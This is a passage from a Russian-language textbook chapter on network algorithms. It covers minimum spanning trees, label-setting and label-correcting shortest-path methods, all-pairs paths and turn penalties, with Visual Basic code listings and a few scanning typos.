Например, предположим, что требуется разработать телефонную сеть, которая должна соединить шесть городов. Можно проложить магистральный кабель между всеми парами городов, но это будет неоправданно дорого. Меньшую стоимость будет иметь решение, при котором города будут соединены связями, которые содержатся в наименьшем остовном дереве. На рис. 12.5 показаны шесть городов, каждые два из которых соединены магистральным кабелем. Жирными линиями нарисовано наименьшее остовное дерево.
Заметьте, что сеть может иметь несколько наименьших остовных деревьев. На рис. 12.6 показаны два изображения сети с двумя различными наименьшими остовными деревьями, которые нарисованы жирными линиями. Полная цена обоих деревьев равна 32.
@Рис. 12.5. Магистральные телефонные кабели, связывающие шесть городов
========320
@Рис. 12.6. Два различных наименьших остовных дерева для одной сети
Существует простой алгоритм поиска наименьшего остовного дерева для сети. Вначале поместим в остовное дерево любой узел. Затем найдем связь с наименьшей ценой, которая соединяет узел в дереве с узлом, который еще не помещен в дерево. Добавим эту связь и соответствующий узел в дерево. Затем эта процедура повторяется до тех пор, пока все узлы не окажутся в дереве.
Этот алгоритм похож на эвристику восхождения на холм, описанную в 8 главе. На каждом шаге оба алгоритма изменяют решение, пытаясь его максимально улучшить. Алгоритм остовного дерева на каждом шаге выбирает связь с наименьшей ценой, которая добавляет новый узел в дерево. В отличие от эвристики восхождения на холм, которая не всегда находит наилучшее решение, этот алгоритм гарантированно находит наименьшее остовное дерево.
Подобные алгоритмы, которые находят глобальный оптимум, при помощи серии локально оптимальных приближений называются поглощающими алгоритмами(greedy algorithms). Можно представлять себе поглощающие алгоритмы как алгоритмы типа восхождения на холм, не являющиеся при этом эвристиками — они гарантированно находят наилучшее возможное решение.
Алгоритм наименьшего остовного дерева использует коллекцию для хранения списка связей, которые могут быть добавлены к остовному дереву. Вначале алгоритм помещает в этот список связи корневого узла. Затем проводится поиск связи с наименьшей ценой в этом списке. Чтобы максимально ускорить поиск, программа может использовать приоритетную очередь типа описанной в 9 главе. Или наоборот, чтобы упростить реализацию, программа может использовать для хранения списка возможных связей коллекцию.
Если узел на другом конце связи еще не находится в остовном дереве, то программа добавляет его и соответствующую связь в дерево. Затем она добавляет связи, выходящие из нового узла, в список возможных узлов.
Алгоритм использует флаг Used в классе link, чтобы определить, попадала ли эта связь ранее в список возможных связей. Если да, то она не заносится в этот список снова.
Может оказаться, что список возможных связей опустеет до того, как все узлы будут добавлены в остовное дерево. В этом случае сеть является несвязной, и не существует путь, который связывает корневой узел со всеми остальными узлами сети.
=========321
Private Sub FindSpanningTree(root As SpanNode)
Dim candidates As New Collection
Dim to_node As SpanNode
Dim link As SpanLink
Dim i As Integer
Dim best_i As Integer
Dim best_cost As Integer
Dim best_to_node As SpanNode
If root Is Nothing Then Exit Sub
' Сбросить флаг Marked для всех узлов и флаги
' Used и InSpanningTree для всех связей.
ResetSpanningTree
' Начать с корня остовного дерева.
root.Marked = True
Set best_to_node = root
Do
' Добавить связи последнего узла в список
' возможных связей.
For Each link In best_to_node.Links
If Not link.Used Then
candidates.Add link
link.Used = True
End If
Next link
' Найти самую короткую связь в списке возможных
' связей, которая ведет к узлу, которого еще нет
' в дереве.
best_i = 0
best_cost = INFINITY
i = 1
Do While i <= candidates.Count
Set link = candidates(i)
If link.Node1.Marked Then
Set to_node = link.Node2
Else
Set to_node = link.Node1
End If
If to_node.Marked Then
' Связь соединяет два узла, которые
' оба находятся в дереве.
' Удалить ее из списка возможных связей.
candidates.Remove i
Else
If link.Cost < best_cost Then
best_i = i
best_cost = link.Cost
Set best_to_node = to_node
End If
i = i + 1
End If
Loop
' Если больше не осталось связей, которые можно
' было бы добавить, то мы сделали все, что могли.
If best_i < 1 Then Exit Do
' Добавить наилучшую связь и узел на ее конце в дерево.
Set link = candidates(best_i)
link.InSpanningTree = True
candidates.Remove best_i
best_to_node.Marked = True
Loop
GotSpanningTree = True
' Перерисовать сеть.
DrawNetwork
End Sub
Этот алгоритм проверяет каждую связь не более одного раза. При проверке каждой связи, она добавляется в список возможных связей, а затем удаляется из него. Если этот список находится в приоритетной очереди на основе пирамид, то для вставки или удаления элемента из очереди потребуется время порядка O(log(N)), где — число связей в сети. В этом случае полное время выполнения алгоритма будет порядка O(N * log(N)).
Если список возможных связей находится в коллекции, как в вышеприведенном коде, то для поиска в списке связи с наименьшей ценой потребуется время порядка O(N), при этом полное время выполнения алгоритма будет порядка O(N2). Для малых N производительность будет приемлемой. Если же число связей в сети достаточно велико, то список возможных связей следует хранить в приоритетной очереди, а не в коллекции.
Программа Span использует этот алгоритм для поиска наименьшего остовного дерева. Эта программа аналогична программе NetEdit. Она позволяет загружать, редактировать и сохранять на диске файлы, представляющие сеть. Если выбрать какойлибо узел в программе двойным щелчком мыши, то программа найдет и выведет на экран наименьшее остовное дерево с корнем в этом узле. На рис. 12.7 показано окно программы Span, в котором показано наименьшее остовное дерево с корнем в узле 9.
======322-323
@Рис. 12.7. Программа Span
Кратчайший маршрут
Алгоритмы поиска кратчайшего маршрута, которые обсуждаются в следующих разделах, находят все кратчайшие пути из заданной точки до всех остальных точек сети, при этом предполагается, что сеть является связанной. Набор связей, используемый всеми кратчайшими маршрутами, называется деревом кратчайшего маршрута (shortest path tree).
На рис. 12.8 показано дерево, в котором дерево кратчайшего маршрута с корнем в узле A нарисовано жирной линией. Это дерево изображает кратчайший маршрут из узла A до всех остальных узлов в сети. Например, кратчайший маршрут из узла A в узел F проходит через узлы A, C, E, F.
Многие алгоритмы поиска кратчайшего маршрута начинают с пустого дерева, к которому затем добавляется по одной связи до тех пор, пока дерево не будет заполнено. Эти алгоритмы можно разбить на две категории в соответствии со способом выбора следующей связи, которая должна быть добавлена к растущему дереву кратчайшего маршрута.
Алгоритмы установки меток (label setting) всегда выбирают связь, которая гарантированно окажется частью конечного кратчайшего маршрута. Этот метод работает аналогично методу поиска наименьшего остовного дерева. Если связь добавлена в дерево, то она не будет удалена позже.
Алгоритмы коррекции меток (label correcting) добавляют связи, которые могут быть или не быть частью конечного кратчайшего маршрута. В процессе рабы алгоритма он может определить, что на место уже находящейся в дереве связи нужно поместить другую связь. В этом случае алгоритм заменяет старую связь новой и продолжает работу. Замена связи в дереве может сделать возможными пути, которые не были возможны до этого. Чтобы проверить эти пути, алгоритму приходится снова проверить пути, которые были добавлены в дерево раньше и использовали удаленную связь.
=====324
@Рис. 12.8. Дерево кратчайшего маршрута
Алгоритмы установки и коррекции меток, описанные в следующих разделах, используют похожие классы для представления узлов и связей. Класс узла включает поле Dist, которое определяет расстояние от корня до узла в растущем дереве кратчайшего маршрута. В алгоритме установки меток, после вставки узла в дерево полю Dist присваивается правильное значение, и оно в дальнейшем не меняется. В алгоритме коррекции меток, значение поля Dist может понадобиться обновить, если алгоритм заменит связь.
Класс узла также включает поле NodeStatus, которое указывает, находится ли узел в дереве кратчайшего маршрута, списке возможных связей, или ни в одной из этих структур. Поле InLink указывает на связь, которая ведет к узлу в дереве кратчайшего маршрута.
Public Id As Integer
Public X As Single
Public Y As Single
Public Links As Collection
Public Dist As Integer ' Расстояние от корня дерева пути.
Public NodeStatus As Integer ' Статус дерева маршрута.
Public InLink As PathSLink ' Связь, ведущая к узлу.
======325
Используя поле InLink, программа может перечислить узлы в пути от корня до узла I в обратном порядке при помощи следующего кода:
Dim node As PathSNode
Set node = I
Do
' Вывести узел.
Print node.Id
If node Is Root Then Exit Do
' Перейти к следующему узлу вверх по дереву.
If node.IsLink.Node1 Is node Then
Set node = node.InLink.Node2
Else
Set node = node.InLink.Node1
End If
Loop
Класс link в алгоритме включает поле InPathTree, которое указывает, является ли связь частью дерева кратчайшего маршрута.
Public Node1 As PathSNode
Public Node2 As PathSNode
Public Cost As Integer
Public InPathTree As Boolean
Оба алгоритма установки и коррекции меток используют список возможных связей, в котором находятся связи, которые могут быть добавлены в дерево кратчайшего маршрута, но они поразному оперируют этим списком. Алгоритм установки меток всегда выбирает связь, которая обязательно окажется частью дерева кратчайшего маршрута. Алгоритм коррекции меток выбирает элемент, который находится на вершине списка.
Установка меток
В начале этого алгоритма значения поля Dist корневого узла устанавливается равным 0. Затем корневой узел помещается в список возможных узлов, при этом значение поля NodeStatus этого узла принимает значение NOW_IN_LIST, указывая на то, что он находится в списке.
После этого выполняется поиск в списке узла с наименьшим значением Dist. Первоначально это будет корневой узел, так как он единственный в списке.
Затем алгоритм удаляет этот узел из списка, и устанавливает значение поля NodeStatus для этого узла равным WAS_IN_LIST, указывая на то, что этот узел теперь является частью дерева кратчайшего маршрута. Поля Dist и IsLink узла уже имеют правильные значения. Для каждого корневого узла, значение поля IsLink равно Nothing, а значение поля Dist равно нулю.
После этого алгоритм проверяет все связи, выходящие из выбранного узла. Если соседний узел на другом конце связи никогда не находился в списке возможных узлов, то алгоритм добавляет его к списку. Он устанавливает значение поля NodeStatus соседнего узла равным NOW_IN_LIST., а значение поля Dist — расстоянию от корневого узла до выбранного узла плюс цене связи. И, наконец, он присваивает значение полю InLink соседнего узла так, чтобы оно указывало на связь с соседним узлом.
========326
Во время проверки алгоритмом связей, выходящих из выбранного узла, если значение поля NodeStatus соседнего узла равно NOW_IN_LIST, то этот узел уже находится в списке возможных узлов. Алгоритм проверяет текущее значение Dist соседнего узла, проверяя, не будет ли путь через выбранный узел короче. Если это так, то он обновляет поля InLink и Dist соседнего узла и оставляет соседний узел в списке возможных узлов.
Алгоритм повторяет этот процесс, удаляя узлы из списка возможных узлов, проверяя соседние с ними узлы и добавляя соседние узлы в список до тех пор, пока список не опустеет.
На рис. 12.9 показана часть дерева кратчайшего маршрута. В этой точке алгоритм проверил узлы A и B, удалил их из списка возможных узлов, и проверил их связи. Узлы A и B уже добавлены к дереву кратчайшего маршрута, и теперь в списке возможных узлов находятся узлы C, D и E. Жирные стрелки на рис. 12.9 соответствуют значениям полей InLink узлов в этой точке. Например, значение поля InLink для узла E соответствует связи между узлами E и B.
После этого алгоритм ищет в списке возможных узлов узел с наименьшим значением Dist. В данной точке значения полей Dist узлов C, D и E равны 10, 21 и 22 соответственно, поэтому алгоритм выбирает узел C. Узел C удаляется из списка возможных узлов, и его полю NodeStatus присваивается значение WAS_IN_LIST. Теперь узел C является частью дерева кратчайшего маршрута, и его поля Dist и InLink имеют правильные значения.
Затем алгоритм проверяет связи, выходящие из узла C. Единственная связь, выходящая из узла C, идет к узлу E, который уже содержится в списке возможных узлов, поэтому алгоритм не добавляет его в список снова.
Текущий кратчайший маршрут от корня в узел E — это путь A, B, E, полная цена которого равна 22. Но цена пути A, C, E равна всего 17., что меньше, чем текущая цена 22, поэтому алгоритм обновляет значение InLink для узла E, и присваивает полю Dist этого узла значение 17.
@Рис. 12.9. Часть дерева кратчайшего маршрута
=========327
Private Sub FindPathTree(root As PathSNode)
Dim candidates As New Collection
Dim i As Integer
Dim best_i As Integer
Dim best_dist As Integer
Dim new_dist As Integer
Dim node As PathSNode
Dim to_node As PathSNode
Dim link As PathSLink
If root Is Nothing Then Exit Sub
' Сбросить значения полей Marked и NodeStatus всех узлов,
' и флаги Used и InPathTree всех связей.
ResetPathTree
' Начать с корня дерева кратчайшего маршрута.
root.Dist = 0
Set root.InLink = Nothing
root.NodeStatus = NOW_IN_LIST
candidates.Add root
Do While candidates.Count > 0
' Найти ближайший к корню узелкандидат.
best_dist = INFINITY
For i = 1 To candidates.Count
new_dist = candidates(i).Dist
If new_dist < best_dist Then
best_i = i
best_dist = new_dist
End If
Next i
' Добавить узел к дерева кратчайшего маршрута.
Set node = candidates(best_i)
candidates.Remove best_i
node.NodeStatus = WAS_IN_LIST
' Проверить соседние узлы.
For Each link In node.Links
If node Is link.Node1 Then
Set to_node = link.Node2
Else
Set to_node = link.Node1
End If
If to_node.NodeStatus = NOT_IN_LIST Then
' Узел раньше не был в списке возможных
' узлов. Добавить его в список.
candidates.Add to_node
to_node.NodeStatus = NOW_IN_LIST
to_node.Dist = best_dist + link.Cost
Set to_node.InLink = link
ElseIf to_node.NodeStatus = NOW_IN_LIST Then
' Узел находится в списке возможных узлов.
' Обновить значения его полей Dist и inlink,
' если это необходимо.
new_dist = best_dist + link.Cost
If new_dist < to_node.Dist Then
to_node.Dist = new_dist
Set to_node.InLink = link
End If
End If
Next link
Loop
GotPathTree = True
' Пометить входящие узлы, чтобы их было проще вывести на экран.
For Each node In Nodes
If Not (node.InLink Is Nothing) Then _
node.InLink.InPathTree = True
Next node
' Перерисовать сеть.
DrawNetwork
End Sub
Важно, чтобы алгоритм обновлял поля InLink и Dist только для узлов, в которых поле NodeStatus равно NOW_IN_LIST. Для большинства сетей нельзя получить более короткий путь, добавляя узлы, которые не находятся в списке возможных узлов. Тем не менее, если сеть содержит цикл, полная длина которого отрицательна, алгоритм может обнаружить, что можно уменьшить расстояние до некоторых узлов, которые уже находятся в дереве кратчайшего маршрута, при этом две ветви дерева кратчайшего маршрута окажутся связанными друг с другом, так что оно перестанет быть деревом.
На рис. 12.10 показана сеть с циклом отрицательной цены и «дерево» кратчайшего маршрута, которое получилось бы, если бы алгоритм обновлял цену узлов, которые уже находятся в дереве.
=======329
@Рис. 12.10. Неправильное «дерево» кратчайшего маршрута для сети с циклом отрицательной цены
Программа PathS использует этот алгоритм установки меток для вычисления кратчайшего маршрута. Она аналогична программам NetEdit и Span. Если вы не вставляете или не удаляете узел или связь, то можно выбрать узел при помощи мыши и программа при этом найдет и выведет на экран дерево кратчайшего маршрута с корнем в этом узле. На рис. 12.11 показано окно программы PathS с деревом кратчайшего маршрута с корнем в узле 3.
@Рис. 12.11. Дерево кратчайшего маршрута с корнем в узле 3
=======330
Варианты метода установки меток
Узкое место этого алгоритма заключается в поиске узла с наименьшим значением поля Dist в списке возможных узлов. Некоторые варианты этого алгоритма используют другие структуры данных для хранения списка возможных узлов. Например, можно было бы использовать упорядоченный связный список. При использовании этого метода потребуется только один шаг для того, чтобы найти следующий узел, который будет добавлен к дереву кратчайшего маршрута. Этот список будет всегда упорядоченным, поэтому узел на вершине списка всегда будет искомым узлом.
Это облегчит поиск нужного узла в списке, но усложнит добавление узла в него. Вместо того чтобы просто помещать узел в начало списка, его придется поместить в нужную позицию.
Иногда также требуется перемещать узлы в списке. Если в результате добавления узла в дерево кратчайшего маршрута уменьшилось кратчайшее расстояние до другого узла, который уже был в списке, то нужно переместить этот элемент ближе к вершине списка.
Предыдущий алгоритм и этот его новый вариант представляют собой два крайних случая управления списком возможных узлов. Первый алгоритм совсем не упорядочивает список и тратит достаточно много времени на поиск узлов в сети. Второй тратит много времени на поддержание упорядоченности списка, но может очень быстро выбирать из него узлы. Другие варианты используют промежуточные стратегии.
Например, можно использовать для хранения списка возможных узлов приоритетную очередь на основе пирамид, тогда можно будет просто выбрать следующий узел с вершины пирамиды. Вставка нового узла в пирамиду и ее переупорядочение будет выполняться быстрее, чем аналогичные операции для упорядоченного связного списка. Другие стратегии используют сложные схемы организации блоков для того, чтобы упростить поиск возможных узлов.
Некоторые из этих вариантов достаточно сложны. Изза этой их сложности эти алгоритмы для небольших сетей часто выполняются медленнее, чем более простые алгоритмы. Тем не менее, для очень больших сетей или сетей, в которых каждый узел имеет очень большое число связей, выигрыш от применения этих алгоритмов может стоить дополнительного усложнения.
Коррекция меток
Как и алгоритм установки меток, этот алгоритм начинает с обнуления значения поля Dist корневого узла и помещает корневой узел в список возможных узлов. При этом значения полей Dist остальных узлов устанавливаются равными бесконечности. Затем для вставки в дерево кратчайшего маршрута выбирается первый узел в списке возможных узлов.
После этого алгоритм проверяет узлы, соседние с выбранным, выясняя, будет ли расстояние от корня до выбранного узла плюс цена связи меньше, чем текущее значение поля Dist соседнего узла. Если это так, то поля Dist и InLink соседнего узла обновляются так, чтобы кратчайший маршрут к соседнему узлу проходил через выбранный узел. Если соседний узел при этом не находился в списке возможных узлов, то алгоритм также добавляет его к списку. Заметьте, что алгоритм не проверяет, попадал ли этот узел в список раньше. Если путь от корня до соседнего узла становится короче, узел всегда добавляется в список возможных узлов.
Алгоритм продолжает удалять узлы из списка возможных узлов, проверяя соседние с ними узлы и добавляя соседние узлы в список до тех пор, пока список не опустеет.
Если внимательно сравнить алгоритмы установки меток и коррекции меток, то видно, что они похожи. Единственное отличие заключается в том, как каждый из них выбирает элементы из списка возможных узлов для вставки в дерево кратчайшего маршрута.
=====331
Алгоритм установки меток всегда выбирает связь, которая гарантированно находится в дереве кратчайшего маршрута. При этом после того, как узел удаляется из списка возможных узлов, он навсегда помещается в дерево и больше не попадает в список возможных узлов.
Алгоритм корректировки всегда выбирает первый узел из списка возможных узлов, который не всегда может быть наилучшим выбором. Значения полей Dist и InLink этого узла могут быть не наилучшими из возможных. В этом случае алгоритм, в конце концов, найдет в списке узел, через который проходит более короткий путь к выбранному узлу. Тогда алгоритм обновляет поля Dist и InLink и снова помещает обновленный узел в список возможных узлов.
Алгоритм может использовать новый путь для создания других путей, которые он мог пропустить раньше. Помещая обновленный узел снова в список обновленных узлов, алгоритм гарантирует, что этот узел будет проверен снова и будут найдены все такие пути.
Private Sub FindPathTree(root As PathCNode)
Dim candidates As New Collection
Dim node_dist As Integer
Dim new_dist As Integer
Dim node As PathCNode
Dim to_node As PathCNode
Dim link As PathCLink
If root Is Nothing Then Exit Sub
' Сбросить поля Marked и NodeStatus для всех узлов,
' и флаги Used и InPathTree для всех связей.
ResetPathTree
' Начать с корня дерева кратчайшего маршрута.
root.Dist = 0
Set root.InLink = Nothing
root.NodeStatus = NOW_IN_LIST
candidates.Add root
Do While candidates.Count > 0
' Добавить узел в дерево кратчайшего маршрута.
Set node = candidates(1)
candidates.Remove 1
node_dist = node.Dist
node.NodeStatus = NOT_IN_LIST
' Проверить соседние узлы.
For Each link In node.Links
If node Is link.Node1 Then
Set to_node = link.Node2
Else
Set to_node = link.Node1
End If
' Проверить, существует ли более короткий
' путь через этот узел.
new_dist = node_dist + link.Cost
If to_node.Dist > new_dist Then
' Путь лучше. Обновить значения Dist и InLink.
Set to_node.InLink = link
to_node.Dist = new_dist
' Добавить узел в список возможных узлов,
' если его там еще нет.
If to_node.NodeStatus = NOT_IN_LIST Then
candidates.Add to_node
to_node.NodeStatus = NOW_IN_LIST
End If
End If
Next link
Loop
' Пометить входящие связи, чтобы их было проще вывести.
For Each node In Nodes
If Not (node.InLink Is Nothing) Then _
node.InLink.InPathTree = True
Next node
' Перерисовать сеть.
DrawNetwork
End Sub
В отличие от алгоритма установки меток, этот алгоритм не может работать с сетями, которые содержат циклы с отрицательной ценой. Если встречается такой цикл, то алгоритм бесконечно перемещается по связям внутри него. При каждом обходе цикла расстояние до входящих в него узлов уменьшается, при этом алгоритм снова помещает узлы в список возможных узлов, и снова может проверять их в дальнейшем. При следующей проверке этих узлов, расстояние до них также уменьшится, и так далее. Этот процесс будет продолжаться до тех пор, пока расстояние до этих узлов не достигнет нижнего граничного значения -32.768, если длина пути задана целым числом. Если известно, что в сети имеются циклы с отрицательной ценой, то проще всего просто использовать для работы с ней метод установки, а не коррекции меток.
Программа PathC использует этот алгоритм коррекции меток для вычисления кратчайшего маршрута. Она аналогична программе PathS, но использует метод коррекции, а не установки меток.
=======333
Варианты метода коррекции меток
Алгоритм коррекции меток позволяет очень быстро выбрать узел из списка возможных узлов. Он также может вставить узел в список всего за один или два шага. Недостаток этого алгоритма заключается в том, что когда он выбирает узел из списка возможных узлов, он может сделать не слишком хороший выбор. Если алгоритм выбирает узел до того, как его поля Dist и InLink получат свои конечный значения, он должен позднее скорректировать значения этих полей и снова поместить узел в список возможных узлов. Чем чаще алгоритм помещает узлы назад в список возможных узлов, тем больше времени это занимает.
Варианты этого алгоритма пытаются повысить качество выбора узлов без большого усложнения алгоритма. Один из методов, который неплохо работает на практике, состоит в том, чтобы добавлять узлы одновременно в начало и конец списка возможных узлов. Если узел раньше не попадал в список возможных узлов, алгоритм, как обычно, добавляет его в конец списка. Если узел уже был раньше в списке возможных узлов, но сейчас его там нет, алгоритм вставляет его в начало списка. При этом повторное обращение к узлу выполняется практически сразу, возможно при следующем же обращении к списку.
Идея, заключенная в таком подходе, состоит в том, чтобы если алгоритм совершает ошибку, она исправлялась как можно быстрее. Если ошибка не будет исправлена в течение достаточно долгого времени, алгоритм может использовать неправильную информацию для построения длинных ложных путей, которые затем придется исправлять. Благодаря быстрому исправлению ошибок, алгоритм может уменьшить число неверных путей, которые придется перестроить. В наилучшем случае, если все соседние узлы все еще находятся в списке возможных узлов, повторная проверка этого узла до проверки соседей предотвратит построение неверных путей.
Другие задачи поиска кратчайшего маршрута
Описанные выше алгоритмы поиска кратчайшего маршрута вычисляли все кратчайшие пути из корневого узла до всех остальных узлов в сети. Существует множество других типов задачи нахождения кратчайшего маршрута. В этом разделе обсуждаются три из них: двухточечный кратчайший маршрут (pointtopoint shortest path), кратчайший маршрут для всех пар(all pairs shortest path) и кратчайший маршрут со штрафами за повороты.
Двухточечный кратчайший маршрут
В некоторых приложениях может понадобиться найти кратчайший маршрут между двумя точками, при этом остальные пути в полном дереве кратчайшего маршрута не важны. Простой способ решить эту задачу — вычислить полное дерево кратчайшего маршрута при помощи метода установки или коррекции меток, а затем выбрать из дерева кратчайший путь между двумя точками.
Другой способ заключается в использовании метода установки меток, который останавливался бы, когда будет найден путь к конечному узлу. Алгоритм установки меток добавляет к дереву кратчайшего маршрута только те пути, которые обязательно должны в нем находиться, следовательно, в тот момент, когда алгоритм добавит конечный узел в дерево, будет найден искомый кратчайший маршрут. В алгоритме, который обсуждался раньше, это происходит, когда алгоритм удаляет конечный узел из списка возможных узлов.
=======334
Единственное изменение требуется внести в часть алгоритма установки меток, которая выполняется сразу же после того, как алгоритм находит в списке возможных узлов узел с наименьшим значением Dist. Перед удалением узла из списка возможных узлов, алгоритм должен проверить, не является ли этот узел искомым. Если это так, то дерево кратчайшего маршрута уже содержит кратчайший маршрут между начальным и конечным узлами, и алгоритм может закончить работу.
' Найти ближайший к корню узел в списке возможных узлов.
:
' Проверить, является ли этот узел искомым.
If node = destination Then Exit Do
' Добавить этот узел в дерево кратчайшего маршрута.
:
На практике, если две точки в сети расположены далеко друг от друга, то этот алгоритм обычно будет выполняться дольше, чем займет вычисление полного дерева кратчайшего маршрута. Алгоритм выполняется медленнее изза того, что в каждом цикле выполнения алгоритма проверяется, достигнут ли искомый узел. С другой стороны, если узлы расположены рядом, то выполнение этого алгоритма может потребовать намного меньше времени, чем построение полного дерева кратчайшего маршрута.
Для некоторых сетей, таких как сеть улиц, можно оценить, насколько близко расположены две точки, и затем решить, какую версию алгоритма выбрать. Если сеть содержит все улицы южной Калифорнии, и две точки расположены на расстоянии 10 миль, следует использовать версию, которая останавливается после того, как найдет конечный узел. Если же точки удалены друг от друга на 100 миль, возможно, меньше времени займет вычисление полного дерева кратчайшего маршрута.
Вычисление кратчайшего маршрута для всех пар
В некоторых приложениях может потребоваться быстро найти кратчайший маршрут между всеми парами узлов в сети. Если нужно вычислить большую часть из N2 возможных путей, может быть быстрее вычислить все возможные пути вместо того, чтобы находить только те, которые нужны.
Можно записать кратчайшие маршруты, используя два двумерных массива, Dist и InLinks. В ячейке Dist(I, J) находится кратчайший маршрут из узла I в узел J, а в ячейке InLinks(I, J) — связь, которая ведет к узлу J в кратчайшем пути из узла I в узел J. Эти значения аналогичны значениям Dist и InLink в классе узла в предыдущем алгоритме.
Один из способов найти все кратчайшие маршруты заключается в том, чтобы построить деревья кратчайшего маршрута с корнем в каждом из узлов сети при помощи одного из предыдущих алгоритмов, и затем сохранить результаты в массивах Dists и InLinks.
========335
Другой метод вычисления всех кратчайших маршрутов последовательно строит пути, используя все больше и больше узлов. Вначале алгоритм находит все кратчайшие маршруты, которые используют только первый узел и узлы на концах пути. Другими словами, для узлов J и K алгоритм находит кратчайший маршрут между этими узлами, который использует только узел с номером 1 и узлы J и K, если такой путь существует
Затем алгоритм находит все кратчайшие маршруты, которые используют только два первых узла. Затем он строит пути, используя первые три узла, первые четыре узла, и так далее до тех пор, пока не будут построены все кратчайшие маршруты, используя все узлы. В этот момент, поскольку кратчайшие маршруты могут использовать любой узел, алгоритм найдет все кратчайшие маршруты в сети.
Заметьте, что кратчайший маршрут между узлами J и K, использующий только первые I узлов, включает узел I, только если Dist(J, K) > Dist(J, I) + Dist(I, K). Иначе кратчайшим маршрутом будет предыдущий кратчайший маршрут, который использовал только первые I - 1 узлов. Это означает, что когда алгоритм рассматривает узел I, требуется только проверить выполнение условия Dist(J, K) > Dist(J, I) + Dist(I, K). Если это условие выполняется, алгоритм обновляет кратчайший маршрут из узла J в узел K. Иначе старый кратчайший маршрут между этими двумя узлами остался бы таковым.
Штрафы за повороты
В некоторых сетях, в особенности сетях улиц, бывает полезно добавить штраф и запреты на повороты (turn penalties) В сети улиц автомобиль должен замедлить движение перед тем, как выполнить поворот. Поворот налево может занимать больше времени, чем поворот направо или движение прямо. Некоторые повороты могут быть запрещены или невозможны изза наличия разделительной полосы. Эти аспекты можно учесть, вводя в сеть штрафы за повороты.
Небольшое число штрафов за повороты
Часто важны только некоторые штрафы за повороты. Может понадобиться предотвратить выполнение запрещенных или невозможных поворотов и присвоить штрафы за повороты лишь на нескольких ключевых перекрестках, не определяя штрафы для всех перекрестков в сети. В этом случае можно разбить каждый узел, для которого заданы штрафы, на несколько узлов, которые будут неявно учитывать штрафы.
Предположим, что требуется добавить один штраф за поворот на перекрестке налево и другой штраф за поворот направо. На рис. 12.12 показан перекресток, на котором требуется применить эти штрафы. Число рядом с каждой связью соответствует ее цене. Требуется применить штрафы за вход в узел A по связи L1, и затем выход из него по связям L2 или L3.
Для применения штрафов к узлу A, разобьем этот узел на два узла, по одному для каждой из покидающих его связей. В данном примере, из узла A выходят две связи, поэтому узел A разбивается на два узла A1 и A2, и связи, выходящие из узла A, заменяются соответствующими связями, выходящими из полученных узлов. Можно представить, что каждый из двух образовавшихся узлов соответствует входу в узел A и повороту в сторону соответствующей связи.
======336
@Рис. 12.12. Перекресток
Затем связь L1, входящая в узел A, заменяется на две связи, входящие в каждый из двух узлов A1 и A2. Цена этих связей равна цене исходной связи L1 плюс штрафу за поворот в соответствующем направлении. На рис. 12.13 показан перекресток, на котором введены штрафы за поворот. На этом рисунке штраф за поворот налево из узла A равен 5, а за поворот направо —2.
Помещая информацию о штрафах непосредственно в конфигурацию сети, мы избегаем необходимости модифицировать алгоритмы поиска кратчайшего маршрута. Эти алгоритмы будут находить правильные кратчайшие маршруты с учетом штрафов за повороты.
При этом придется все же слегка изменить программы, чтобы учесть разбиение узлов на несколько частей. Предположим, что требуется найти кратчайший маршрут между узлами I и J, но узел I оказался разбит на несколько узлов. Полагая, что можно покинуть узел I по любой связи, можно создать ложный узел и использовать его в качестве корня дерева кратчайшего маршрута. Соединим этот узел связями с нулевой ценой с каждым из узлов, получившихся после разбиения узла I. Тогда, если построить дерево кратчайшего маршрута с корнем в ложном узле, то при этом будут найдены все кратчайшие маршруты, содержащие любой из этих узлов. На рис. 12.14 показан перекресток с рис. 12.13, связанный с ложным корневым узлом.
@Рис. 12.13. Перекресток со штрафами за повороты
=======337
@Рис. 12.14. Перекресток, связанный с ложным корнем
Обрабатывать случай поиска пути к узлу, который был разбит на несколько узлов, проще. Если требуется найти кратчайший маршрут между узлами I и J, и узел J был разбит на несколько узлов, то вначале, как обычно, нужно найти дерево кратчайшего маршрута с корнем в узле I. Затем проверяются все узлы, на которые был разбит узел J и находится ближайший из них к корню дерева. Путь к этому узлу и есть кратчайший маршрут к исходному узлу J.
Большое число штрафов за повороты
Предыдущий метод будет не слишком эффективным, если вы хотите ввести штрафы за повороты для большинства узлов в сети. Лучше будет создать совершенно новую сеть, которая будет включать информацию о штрафах.
Для каждой связи между узлами A и B в исходной сети в новой сети создается узел AB;
Если в исходной сети соответствующие связи были соединены, то полученные узлы также соединяются между собой. Например, предположим, что в исходной сети одна связь соединяла узлы A и B, а другая — узлы B и C. Тогда в новой сети нужно создать связь, соединяющую узел AB с узлом BC;
Цена новой связи складывается из цены второй связи в исходной сети и штрафа за поворот. В этом примере цена связи между узлом AB и узлом BC будет равна цене связи, соединяющей узлы B и C в исходной сети плюс штрафу за поворот при движении из узла A в узел B и затем в узел C.
На рис. 12.15 изображена небольшая сеть и соответствующая новая сеть, представляющая штрафы за повороты. Штраф за поворот налево равен 3, за поворот направо — 2, а за «поворот» прямо — нулю. Например, так как поворот из узла B в узел E — это левый поворот в исходной сети, штраф для связи между узлами BE и EF в новой сети равен 3. Цена связи, соединяющей узлы E и F в исходной сети, равна 3, поэтому полная цена новой связи равна 3 + 3 = 6.
=======338
@Рис. 12.15. Сеть и соответствующая ей сеть со штрафами за повороты
Предположим теперь, что требуется найти для исходной сети дерево кратчайшего маршрута с корнем в узле D. Чтобы сделать это, создадим в новой сети ложный корневой узел, затем построим связи, соединяющие этот узел со всеми связями, которые покидают узел D в исходной сети. Присвоим этим связям ту же цену, которую имеют соответствующие связи в исходной сети. На рис. 12.16 показана новая сеть с рис. 12.15 с ложным корневым узлом, соответствующим узлу D. Дерево кратчайшего маршрута в этой сети нарисовано жирной линией.
Чтобы найти кратчайший маршрут из узла D в узел C, необходимо проверить все узлы в новой сети, которые соответствуют связям, заканчивающимся в узле C. В этом примере это узлы BC и FC. Ближайший к ложному корню узел соответствует кратчайшему маршруту к узлу C в исходной сети. Узлы в кратчайшем маршруте в новой сети соответствуют связям в кратчайшем маршруте в исходной сети.
@Рис. 12.16. Дерево кратчайшего маршрута в сети со штрафами за повороты
========339
На рис. 12.16 кратчайший маршрут начинается с ложного корня, идет в узел DE, затем узлы EF и FC и имеет полную цену 16. Этот путь соответствует пути D, E, F, C в исходной сети. Прибавив один штраф за левый поворот E, F, C, получим, что цена этого пути в исходной сети также равна 16.
